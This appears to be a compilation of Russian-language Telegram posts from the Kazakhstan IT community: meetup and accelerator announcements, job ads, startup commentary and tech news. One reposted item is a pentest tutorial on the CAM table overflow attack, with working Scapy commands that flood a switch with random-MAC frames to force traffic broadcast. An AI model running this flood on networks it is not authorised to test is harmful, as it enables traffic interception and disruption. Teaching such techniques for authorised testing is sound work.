Краткое резюме прошлого митапа и расширенное интервью с Каиржаном здесь

Уважаемые представители IT-рынка города Алматы!

Приглашаем Вас на круглый стол по вопросам цифровой трансформации обороны с участием Заместителя Министра обороны Д.М. Ахмедиева в оффлайн формате.

У Вас будет возможность поделиться идеями и предложить свои решения, "годные для службы в армии"!

Дата: четверг, 26 мая 2022 года в 17:00 ч.
Место: г. Алматы, проспект Гагарина, 124 (вход со стороны пр. Абая) Sail Coworking

Регистрация по ссылке

Кризис близко

Y Combinator на днях разослали предупреждающее письмо своим стартапам — они советуют «запасаться жирком» и готовиться к худшему на фоне падения рынка. Биржевые индексы с начала года упали на 20-30%, больше всего пострадали технологические компании. Например, финтех оценивался на бирже в 25 годовых выручек ещё в октябре прошлого года, а сейчас средний показатель — 4-5 выручек.

Пессимизм распространяется и в мир частных компаний. Крупные инвесторы по типу Softbank сокращают вложения на 50-75%. Из-за этого стартапы уже начали резать расходы и сокращать сотрудников.

Но турбулентное время всегда открывает новые возможности для стартеров. Вот несколько примеров:

- Salesforce начали развитие в кризис доткомов. Они предложили своим клиентам новую модель сотрудничества — SaaS, став благодаря этому мировым лидером на рынке CRM-систем.

- Airbnb и Uber родились во время мирового финансового кризиса, открыв новые способы заработка для людей.

- Mailchimp решился внедрить freemium-модель в 2009 году — и вырос в 5 раз за год по числу пользователей, нарастив при этом прибыль на 650%.

- Основатель Whatsapp тоже не поддался пессимизму 2009 года и разглядел в App Store зарождающийся тренд. Через 5 лет Whatsapp продался Цукербергу за $19В.

- В разгар мирового финансового кризиса появились первопроходцы финтеха (Square) и крипты (Биткоин).

Итог — пока все остальные укутываются в кокон и сидят в обесценивающемся кэше, самое время атаковать: запускать стартапы, тестировать новые гипотезы, ловить тренды, переманивать лучших сотрудников.

Какие ещё возможности открывает надвигающийся кризис? Давайте побрейнстормим в комментариях.

We are a web3 focused ed-tech startup looking to disrupt how the developers of the future construct web3.

With over 10 modules now focusing on different aspects of Web3 projects. I am currently looking to connect with various developer communities for partnership opportunities and trying to see how metaschool can help with your needs for better content and an easy-to-use interface to improve your communities ability to enter the Web 3 space and turn out to be better developers.

This weekend we will be having a free live coding camp event conducted by our founder on Smart Contracts and minting NFTs on Open Sea. It would be great if you could spread the word in your developer community and if there is enough demand we can make this an exclusive event for you in the future.

Timing: 5pm (GMT 4)
Date: 29/05/2022

Anyone can register here and get the virtual link- https://metaschool.so/live-sessions/web3-coding-camp-write-a-smart-contract-and-mint-elon-musk-nft-on-opensea/?ref=may-29-codingcamp-event

АО «Казахстанский центр индустрии и экспорта «QazIndustry» приглашает ИТ-компании к регистрации на Площадке цифровой трансформации

▪️В рамках исполнения поручения Главы государства К.К.Токаева,
АО «QazIndustry» ведется работа по внедрению цифровых решений в отечественную промышленность. В этой связи была разработана Площадка цифровой трансформации, предназначенная для взаимодействия промышленных предприятийи и заинтересованных сторон (ИТ-компаний, НИИ, организации образования и др.).

▪️На текущий момент в рамках данной Площадки сформировано более 400 цифровых профилей промышленных предприятий, а также более 100 решений от 70 отечественных ИТ-компаний.

▪️АО «QazIndustry» приглашает ИТ-компании к регистрации на Площадке цифровой трансформации по адресу: https://digital.qazindustry.gov.kz/
Для регистрации необходимо заполнить контактные данные, БИН и сведения об организации.
Публикация собственных цифровых решений для промышленности доступна в разделе «Данные компании» – «Добавить Проект».

На днях получилось посетить новый MOST hub в Алмате. Несмотря на то что официальное открытие еще не состоялось, там уже находяться ИТ компании/фрилансеры/стартаперы с соседних стран и Европы даже. Аренда офиса 90 000 kzt в месяц на мой взгляд дороговато, но я в ценах не разбираюсь. Порадовала хорошая кухня, гардероб, пространства все по фен шую. И рядом парк. Вот мой непрофессиональный видео отрезок:

#вакансия #разработчик #it #developer #csharp #astana

🧰 Middle / Senior C#/.Net разработчик
🏢 ТОО “DauInvest” (TrustMe.kz)
📍 г. Нур-Султан

🎯 Что нужно делать:
• Проектировать архитектуры модулей/веб-приложений;
• Разрабатывать и дорабатывать веб-приложения и сервисы;
• Оптимизировать веб-приложения;
• Автоматизировать и развивать процессы разработки

✅ Наш стек:
• C# .Net Core
• PostgreSQL, Mongo
• AWS Lambda, Elastic Search
• ООП, SOLID.
• Redis
• Git, Docker
• CI/CD, Nginx
• Rest, Graphql

Опыт работы: от 3 лет

🧩 Условия:
Полный рабочий день в офисе (сб-вс выходной);
Официальное оформление, полный соц.пакет (Договор ГПХ первые 3 месяца испытательного срока);
Возможность получить договор опциона;
Молодой и дружный коллектив;
Тренинги, тимбилдинги, выезды на природу;
Пересмотр заработной платы каждые 6 месяцев.

Не уверены, что подходите нам - откликайтесь, рассмотрим всех кандидатов)

👤 Контакты:
📱 +77086392834 Жанна
https://t.iss.one/Zhanna_tbz

#Удаленка #Middle #TestEngineer #Typescript

🔥Вакансия: Middle Engineer in Test на Typescript
🔥Город: Los Angeles
🔥Компания: https://www.profi.io
🔥Форма работы: Удаленно
🔥Занятость: Полная
🔥Вилка: $3000 готовы обсуждать выше

Помогаем с релокацией в Сербию
Контакты📩 Юлия
Телеграмм @yulia_tri
Почта [email protected]

Ищем сильного Middle Engineer in Test на Typescript. Ты должен(на) быть с продуктовым подходом в работе (не перекидывать через забор), проявлять инициативу в принятии решений и не бояться обсуждений. Возможность участвовать в выстраивании пирамиды тестирования в правильном виде с нуля, минимум бюрократии и максимум открытости к обратной связи. Работа подразумевает много взаимодействия с инженерной командой разработки (Engineers, QAs, DevOps, Technical Leads).

Сейчас: POC концепта автоматизации на Playwright и Typescript. Будущее: Выстроить пирамиду тестирования с E2E тестами, привлечь инженеров к написанию тестов, улучшить качество продукта и сократить релиз-цикл.

Предстоит:
• Работать с тестовым фреймворком (расширение фреймворка, написание новых тестов и поддержание текущих) на Playwright
• Писать документацию и привлекать инженеров к написанию тестов
• Писать тесты на регрессию и делать ревью кода разработанных тестов
• Не бояться протестировать новую функциональность, создать тестовую документацию и покрыть автотестами - то есть участие в полном цикле тестирования
Обязательный опыт:
• 2+ года работы в автоматизации с Javascript/Typescript
• Проекты, над которыми ты работал(а) выходили в production и ты понимаешь, какие тесты стоит (а какие не стоит) запускать на нём
• Оценишь преимущество написания на Typescript
• Понимаешь важность E2E автотестов, где их место в пирамиде тестирования и когда может быть перекос
• Видишь разницу, где стоит писать E2E тест, а где можно применить моки
• Считаешь, что Engineer in Test (QA Automation) - не выделенная роль, которая только интересуется автотестами и тестовой инфраструктурой, а полноценный участник команды, тестирующий продукт на всех стадиях SDLC
• Опыт в полном цикле тестирования продукта: от тестирования требований, до покрытия регрессионными E2E тестами
• Имеешь уровень английского B1+

Опционально:
• Опыт в мобильной автоматизации
• Опыт работы с Playwright

❗️В отклике на вакансию опиши несколькими абзацами, как бы ты тестировал(а) видеозвонки в автотестах на Playwright.❗️

https://www.ferra.ru/news/techlife/khakery-nachali-ispolzovat-pdf-faily-dlya-vzloma-kompyuterov-25-05-2022.htm



Группа специалистов по кибербезопасности из HP Wolf Security провели исследование. Оно показало, что в Сети участились случаи использования PDF-документов для взлома компьютеров.

Хакеры начали использовать PDF-файлы для взлома компьютеров

Сценарий подобных атак следующий: жертва получает электронное письмо, в котором говорится о полагающейся ей выплате. К письму также прикрепляется PDF-файл, после открытия которого пользователю предлагается воспользоваться текстовым редактором Word.

Подразумевается, что приложение Microsoft запустит содержащийся внутри docx-файл, который и является заражённым. Что интересно, хакеры научились обманывать систему защиты. Так, открыв файл, пользователь видит уведомление о том, что документ был проверен и не является опасным.

Напомним, что чуть ранее также стало известно о появлении нового вируса-вымогателя Magniber. Его злоумышленники прятали в поддельных файлах обновлений Windows 11.

В 2022 году новую игру надо делать с NFT. Венчурные фонды платят за модное слово инвестициями, пользователи - живыми деньгами, основателям то и другое одинаково приятно. А дальше возникает вопрос - а зачем это NFT в игре всё-таки нужно, если забыть о пирамидальных схемах, с ними как раз всё понятно.

Два варианта ответа дает американский #стартапдня InfiniGods. Готовых игр у них пока нет, но обещания они раздают охотно. Во-первых, NFT будет инструментом переноса достижений между играми. Надоело играть в одну - пошел играть в другую и волшебный меч с собой захватил. Стартап обещает даже открытый API для интеграции со всеми играми, а не только со своими. Зачем тут именно уникальные токены не совсем понятно, но хотя бы блокчейн вполне к месту - центральному серверу конкурирующие игры бы не доверяли.

О проблемах такого использования InfiniGods тоже рассуждает вполне открыто - игры-то все разные, в космоопере трудно использовать меч короля Артура. Предлагаемое решение: “NFT будут хранить совсем базовые свойства, сила +1, выносливость +2, в таком духе, это в любой игре поддержать можно”. Ответ мне кажется слабым, но другого нет.

Вторая ценность NFT - влияние на разработчиков. На голосование игроков будут выноситься решения о добавлении новых фич и уровней, выиграют те, кто предъявит больше токенов. Тут я даже и смысла блокчейна не понимаю, старые добрые игровые кристалы работали бы в качестве бюллетеней ничуть не хуже. Этот аргумент основатели стартапа в своих пиар-материалах обходят.

На этом, собственно, всё. Третьей пользы от NFT InfiniGods не придумал. Инвестиций стартап в марте привлек 9 миллионов долларов, релиз первой игры он тогда планировал в мае - несколько дней в запасе ещё осталось.

https://www.infinigods.com/

#nft #blockchain #развлечения #игры #сша #seed

Мы собрали следующие вопросы для субботнего митапа: 1. What is your typical work day
2. Как вы видите сотрудничество в научном плане между странами
3. Какие пути развития науки в постсоветском пространстве
4. Какие новшества используются в МФТИ которые могли бы использовать и наши ВУЗЫ
5. В чем секрет Физтеха? Почему-то не знаю стартаперов из МГУ, но знаю Revolut Сторонского. Как и когда у молодых в Физтехе зарождается и оттачивается голод до инноваций?

Вот стажировка до джуна, но она чуток не закончена, ибо мы постепенно доку дополняли и стажер просто не успел все за 3 месяца пройти и мы решили пусть выходит на работу, там что надо подтянет:
https://docs.google.com/document/d/1IrureMwuCknqwF2IC-yctukF65MQW68Pq_zeqPZ5pgk/edit?usp=sharing

Хороший силлабус стажировки backend от пользователя @shadowsmind

Использование атаки CAM Table Overflow в пентесте

Атака CAM Table Overflow
Иног­да такая ата­ка называ­ется перепол­нени­ем таб­лицы MAC-адре­сов. Прин­цип этой ата­ки сос­тоит в том, что­бы выз­вать перепол­нение ком­мутаци­онной мат­рицы. В слу­чае чего ком­мутатор, гру­бо говоря, прев­раща­ется в хаб и начина­ет рас­сылать пос­тупа­ющие кад­ры во все пор­ты, что вызыва­ет иде­аль­ные усло­вия для перех­вата тра­фика.

Вызывать перепол­нение очень прос­то, ведь у ком­мутато­ров огра­ничен раз­мер таб­лиц MAC-адре­сов. При запол­нении таб­лицы MAC-адре­сов зло­умыш­ленник смо­жет видеть все рас­сыла­емые кад­ры из всех пор­тов.

CAM Table Overflow
Вос­поль­зуем­ся Scapy, что­бы про­вес­ти такую ата­ку. В качес­тве MAC-адре­са источни­ка пусть будет ран­домизи­рован­ный MAC-адрес, каж­дый новый генери­рующий­ся кадр будет с новым MAC-адре­сом. MAC-адре­сов наз­начения это тоже каса­ется.

Да­лее с помощью метода sendp выпол­няем рас­сылку фик­тивных кад­ров Ethernet. Задав loop = 1, зацик­лим отправ­ку этих кад­ров.


>>> malicious_frames = Ether(src=RandMAC(), dst=RandMAC())
>>> sendp(malicious_frames, iface="eth0", loop=1, verbose=1)

Дамп тра­фика в момент про­веде­ния ата­ки
Таб­лица MAC-адре­сов ком­мутато­ра до ата­ки:

CoreSW#show mac address-table count

Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 3
Static Address Count : 0
Total Mac Addresses : 3

Total Mac Address Space Available: 7981
Таб­лица MAC-адре­сов ком­мутато­ра пос­ле ата­ки:

CoreSW#show mac address-table count

Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 7981
Static Address Count : 0
Total Mac Addresses : 7981

Total Mac Address Space Available: 7981

По­ка таб­лица MAC-адре­сов не запол­нена, ком­мутатор будет переда­вать все кад­ры из всех пор­тов, исполь­зуя широко­веща­тель­ную рас­сылку.

Статья

@linuxkalii

Минфин Израиля потребовал от премьер-министра страны немедленно созвать специальное заседание по вопросу переноса компании «Яндекс» в Израиль. Власти также собираются предоставить всем российским специалистам работающим в компании, проездной пятилетний документ - «лессе-пассе».

Таким образом, Яндекс полностью релоцируется в Израиле. @bankrollo

Если вдруг кто-то хочет посетить ММК и попасть на конференцию одного из крупнейших RPA центров компетенции.

https://rpanext.ru/conference/

ОБЪЯВЛЕНЫ ПОБЕДИТЕЛИ КОНКУРСА «BPM-ПРОЕКТ ГОДА’2022»

25.05.2022 на итоговой конференции конкурса «BPM-проект года’2022», были объявлены победители и призеры.

- Главный приз конкурса, а также приз Роскачества и приз ИТ-кластера Сколково получил проект ВТБ Онлайн «Упрощенный налоговый вычет без документов»

Призеры конкурса

- Приз за самый результативный проект — «Кормовит», «Увеличение прибыли в три раза за счёт изменения бизнес-процессов продаж и закупок»
- Приз за самый инновационный проект — «Маркетплейс трэйдинг», «Sello — маркетплейс для всех»
- Приз за лучший проект BPM среди государственных организаций — АНО «Служба обеспечения деятельности финансового уполномоченного», «Единая сервисная экосистема работы с обращениями»
- Специальный приз жюри за элегантное решение масштабной управленческой задачи — Комос групп, «Комплексный проект по созданию и внедрению Общих центров обслуживания»
- Приз сообщества ABPMP Russia — X5 GROUP, «Создание общего центра обслуживания HR»

Лауреаты конкурса

- ОАО «РЖД», «Фабрика роботизации бизнес-процессов»
- Государственная инспекция по контролю за использованием объектов недвижимости города Москвы, «Система категоризации рисков на основе объективных источников получения данных о принципах нарушений»
- Автохолдинг Максимум, «Управление обратной связью с потребителями»

Поздравляем победителей и призеров!

Фото/видео отчет об итоговой конференции готовится, оставайтесь на связи!

https://bpmaward.ru/schedule-2022/

💥 Друзья!

Astana Hub продолжает прием заявок на акселерационную программу Silkway Accelerator который проводится в партнерстве с Google for Startups.

В программе могут принять участие стартап-компании на стадии Product/market fit из стран Центральной Азии, а также Азербайджана и Монголии.

В рамках Silkway Accelerator, Вы на бесплатной основе получите:

🔹 Доступ к уникальным воркшопам от экспертов Google for Startups и Astana Hub;
🔹 Индивидуальное менторство от специалистов Google for Startups и Astana
🔹 Возможность получения финансирования на сумму до $55,000;
🔹 Апартаменты для проживания в г. Нур-Султан;
🔹 Networking с Google for Startups комьюнити;

🪐 Запуск Silkway Accelerator состоится 20 июня. По результатам отбора 15 лучших проектов на бесплатной основе смогут участвовать в акселерации, которая будет проходить в офлайн-формате в г. Нур-Султан и продлится 3 месяца.

❗️Если хочешь прокачать свой стартап успей зарегистрироваться до 5 июня. Более подробную информацию можно получить по ссылке.

Сегодня в курилке на скамеечке возле физмат школы обсуждали с гуру DevOps культуры @nurbeksadykov CEO qCloudy.io что в data science модели - не самая большая часть ML проектов. На самом деле они являются самой маленькой частью (но самой важной частью по функциям). Нет ничего, что подчеркивало бы это, как изображение ниже.

Вкратце, процессы MLOps это:
- Обработка данных: сбор, labeling, предварительная обработка
- Моделирование процессов, обучение, оценка, тестирование
- Вывод в прод - мониторинг и обслуживание моделей, потому что с течением времени модели деградируют.
Нурбек было начал про построение мат. моделей, но думаю это заслуживает отдельного митапа.